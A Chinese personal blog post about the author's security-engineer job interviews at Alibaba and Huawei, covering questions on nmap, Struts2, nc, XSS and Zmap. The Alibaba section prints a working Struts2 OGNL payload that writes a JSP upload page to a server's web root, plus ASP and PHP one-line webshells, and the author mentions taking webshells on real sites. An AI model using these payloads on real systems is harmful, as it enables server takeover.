最近这一周真是累的不行,中秋节去参加同学婚礼,21号回到南京已经比较晚了,然后就开始了这一周艰难的求职生涯。
首先22号晚上在东大九龙湖校区参加阿里巴巴安全工程师的笔试,关于题目我已经在前一篇博客中提到http://blog.csdn.net/abcd51685168/article/details/11907935。反正考了一个小时,还算顺利,结束后心想应该能收到面试通知吧。回到学校后本来已经确定了23号去华为参加面试,结果收到了趋势的笔试通知,趋势可是我在南京的首选,果断推迟华为面试,延迟到26号~23号去南大鼓楼校区参加趋势的笔试,难度还是蛮大的,据说全国只招40个人,估计自己也没什么戏。当天晚上11:30多点收到阿里巴巴的面试通知,24号早上九点新街口某酒店面试。
24号早晨6点多就起来了,冒着大雨出门,第一次去还不认识路,找了好久才找到,可怜板鞋基本湿了。轮到面试已经9:30了,面试官是一个40左右的人,上来看了我的简历也不让我自我介绍,直接就问简历上针对网段的PC渗透测试是什么,怎么做的。我就说在BT渗透测试平台下做的,用nmap扫描存活主机,开放端口以及OS等等,然后用Nessus扫描看存在哪些常见漏洞或是弱口令等等。然后他点点头,问nmap中-sS是什么意思,我当时凭着自己的印象说这应该是syn扫描吧。然后问道一些常见漏洞,我就说XSS,CSRF等等,尤其提到了前段时间让整个黑客全疯狂的struts2漏洞。他显然感兴趣了,就问这个漏洞原理是什么,我当时就乐了,这个可是我准备很久的东西。然后就说这个漏洞是框架漏洞,主要在action、redirect以及redirectaction三个页面出现,处理http参数时调用底层的getter/setter,将http参数声明为ONGL语句,虽然可以过滤'#',但如果使用Java的Unicode字符\u0023就可以绕过安全机制,执行远程代码,还提到当时自己也确实拿到了好几个webshell。还问到nc命令,这个对于稍微对网络安全感点兴趣的肯定都知道,我就讲了下客户端和服务端分别的命令。然后他问道如果我在本地nc监听,如何使得获得到远程shell后立刻执行某一命令,当时跟他探讨了半天,也没想出来。后来向他请教了下,他说利用重定向,nc -lp port < 1.txt,当时恍然大悟,这不就是利用nc重定向传文件的利用么。只不过存在不会自动退出的问题,当时提了下nc才只有几十K,功能真心强大。他说现在有个工具好像叫tcat是nc的升级版。后来我不知道怎么提到了Zmap,他似乎感到很惊讶,说你还知道Zmap啊~~~然后还问了下XSS漏洞的原理以及CSRF漏洞怎么防范,我也就随便扯扯。后来问道无线密码的破解,我就把在BT下对WPA2无线密码的破解过程说了下,他还比较满意。又问了TCP三次握手,当时似乎很在状态,胸有成足地说那个啊,就syn、ack、syn+ack,巴拉巴拉说了具体过程,后来回来一想,顺序都搞反了,肠子都悔青了,不过估计那面试官当时也有点晕吧。后来又问道synflood的原理,这就比较简单啦。然后说道你对网络安全的哪块感兴趣啦等等……总之一面还是感觉不错的,想着应该能进二面了吧。
出来后让我等会,当天如果说可以回去了,两周内给通知的就是直接被刷的节奏,目测刷了90%,出来一个走一个。后来我沾沾自喜地等了一个多小时,饿得前胸贴后背了,最后那工作人员来了一句你可以先回去了,两周内给通知。我当时那个郁闷啊,心想你要刷人早点嘛,干嘛给人希望又给人失望呢。后来出来后吃了碗鸭血粉丝汤就回学校了,免不了又吐槽一番。
当天郁闷了一天,结果第二天回到实验室打电话叫我参加阿里巴巴二面,当时瞬间又觉得有希望了。通知的两点面试,到那一点四十吧,结果一直等到2:30,二面有两个面试官,目测一个是人力资源的一个是项目经理级别的。首先一看简历很寒酸,什么都没有,就还是问道那个PC渗透测试,后来又问道你一般都看哪些网站和书籍啊。我就扯到wooyun、lcx.cc还有吴翰清的《白帽子讲WEB安全》(不知道这个可不可以加点分……)。然后又问道lcx.cc是谁的网站,他有哪些事迹……我只知道是核总的,至于事迹嘛,呵呵……后来又让我完整演示一遍自己做的的一次入侵或者漏洞利用,包括命令,我就提了一个用批处理连接ipc漏洞以及msf下利用MS08-067漏洞拿shell的过程,貌似他不怎么满意。然后说wooyun上最近有哪些漏洞啊,我就讲了wordpress注入对象,跑用户名密码以及struts2漏洞,他明显没有一面的面试官那么好忽悠,说struts2漏洞不过去很久了么,然后问了下原理,我自然能说得出来,接下来让我悲催的事情发生了,他居然叫我写出利用代码,这尼玛这么长的代码我哪里写得出啊,在此贴一下当时的漏洞利用代码
?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
这就会在首页根目录新建一个css3.jsp,然后打开css3.jsp,利用一个上传页面,上传上去一个jsp木马,就拿到了webshell。
反正这个真心回答不出来,后来不知道怎么地又扯到脱库的问题,他说脱库的一般流程是什么,还要写命令。我一般拿到webshell后喜欢拿主机的root,不喜欢脱库,所以这个尼玛又是不知道。他说你拿到webshell后不就为了脱库么,我当时无语。后来又问道你写个一句话木马呢,我就写了<%eval request("value")%>,然后他问这是什么语言,这让我没学过asp、jsp、php的人情何以堪,果断不知道。后来回来查了下asp一句话木马:<%execute(request("value"))%>,php一句话木马:<?php eval($_POST[value]);?>
后来我又不知道脑子怎么抽筋了,提到了Zmap,他说这个是全网段扫描,扫描整个网段只要45min,以前也想做全网段扫描,但一直做不起来,然后让我说说Zmap速度这么快的原理是什么,当时愣住了,这篇文章看了有一段时间了,真心记不起来它的原理了,后来回来看了下,发现zmap是发送SYN,随后发送RST(重置连接),不存在监听同步操作,清空连接,再继续发下一个数据包。 而对于识别 zmap把 Ip地址和端口做了类似hash表一样的映射,当数据包返回时(可能是Syn+Ack,也可能RST),取出返回数据包里Ip和端口地址进行储存的hash表里查询,并对应处理记录。 同步变异步高效的基本原因。
反正觉得面的比较惨,会的不够深入,后来那美女HR又问了几个很宽泛的问题,比如你觉得淘宝存在什么漏洞啦等等。面试完了我就觉得应该没戏了,果然等了两分钟直接让回去了……20W的年薪真的不是好拿的啊……
然后26号下午去华为面试,经过了阿里巴巴的两次面试的确有经验了。今年华为不知道怎么了,开启不刷人节奏,技术面基本不问技术,只是跟你扯扯论文专利什么的,明显他不懂,后来看我简历中有写到socket tcp通信,就问了下实现过程,还问了下如何在应用层实现数据包不丢失,这些都比较好回答。其中有一小会,面试官不说话,估计一看简历什么都不懂也不知道问什么吧,然后我就提到了我最为感兴趣的网络安全技术,他就说那你说说网络安全方面的呢。我当时都乐开花了,就关于网络安全以及Internet共享上网包括无线破解等方面扯了十几分钟,后来又问我对多线程了解不,我说知道,但是没做过大的项目。然后就扯了会critical section、mutex、event、semaphore这四个用于进程间同步的,反正又扯了好几分钟,他点点头,觉得还蛮不错的。
上楼等了有半个小时吧,通知二面,(我可以说在此期间我偷偷吃了那边的一根香蕉嘛),是一个比较年轻的面试官,目测只有三十多,要不就是保养得好。看我来了,还站起来让我坐下,特别有风度。自我介绍后就问了下对华为有什么了解啊,为什么想呆在华为啊。然后问我用什么语言编程,数据结构学过吗,顺便问我堆和栈的区别,又问我操作系统呢、计算机网络原理呢……反正都无关紧要的,因为我提过我对网络安全比较感兴趣,他问我是不是愿意从事网络设备比如路由器相关的C语言研发工作,和硬件有点相关,我说是不是只是研发,有没有涉及安全的,他说当然有啊,路由器肯定要经过安全渗透测试的。然后他问我还有没有什么要问的,我就随便问了晋升机制什么的。他说非常希望你能来华为从事研发工作,五个工作日内给通知,最后很有风度的和我握了下手。
走在回去的路上就想华为跟阿里巴巴的面试真的差的好多,完全是天壤之别。年薪10W跟20W差别的确好大……
PS:到今天晚上还木有收到趋势面试通知,估计又被鄙视了,我最爱的趋势啊,华丽丽地把我抛弃了……哎,这种小学校的小硕跟东大真心比不了,洗洗睡吧~~~
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
